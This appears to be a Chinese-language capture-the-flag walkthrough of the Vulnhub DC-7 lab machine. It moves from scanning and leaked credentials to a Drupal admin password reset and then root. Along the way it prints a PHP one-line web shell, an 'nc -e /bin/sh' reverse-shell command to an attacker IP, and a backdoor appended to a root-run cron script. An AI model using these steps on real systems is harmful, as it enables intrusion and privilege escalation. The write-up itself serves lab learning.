1.nmap -sP 192.168.0.1/24 探测内网主机
2.nmap -A -p 1-65535 192.168.0.104 发现开放22/80,linux主机
3.80进入发现是drupal,和dc1一样,漏洞利用失败,提示Way "outside" the box,在页面下面发现@DC7USER,访问一下发现是github的一个项目,在config文件里发现$username = "dc7user";$password = "MdR3xOgB7#dW";尝试ssh登录
4.ssh dc7user@192.168.0.104 登录成功,ls发现两个文件,.gpg是一种加密暂时看不了,
mbox里面记录的应该是一个定时的计划任务,可以看到时间间隔大约为15min,计划任务为/opt/scripts/backups.sh:
5.cat /opt/scripts/backups.sh:发现drush
6.利用drush改密码cd /var/www/html
drush user-password admin --password="123"
7.登录成功随便点点,发现可以发布页面
网站语言为php,想到写入php代码,但是发现目前只能写入静态html,不支持php代码,因为Drupal 8后为了安全,需要将php单独作为一个模块导入。那么就导入php模块吧。
manage.extend
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz导入php模块成功,启用php filter,点击下面的安装即可
8.写入一句话木马,<?php system($_GET[cmd]);?>
http://192.168.0.104/node/1?cmd=nc%20-e%20/bin/sh%20192.168.0.100%209999
kali监听9999,nc -lvp 9999
9.python -c 'import pty;pty.spawn("/bin/bash")'起一个交互式的shell
还记得之前的/opt/scripts/backups.sh么
cd /opt/scripts/
10.ls -al那个配置文件,发现root权限执行,我们当前有权限更改这个配置文件echo "nc -e /bin/sh 192.168.0.100 1234" >> backups.sh
kali监听1234等待即可
11.cd
查看theflag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
If you enjoyed this CTF, send me a tweet via @DCAU7.
文章参考vulnhub渗透实战-DC7 - Wuzhiyu - 博客园 (cnblogs.com)
收获
- 利用drush改密码cd /var/www/html
- @DC7USER信息收集
Comments NOTHING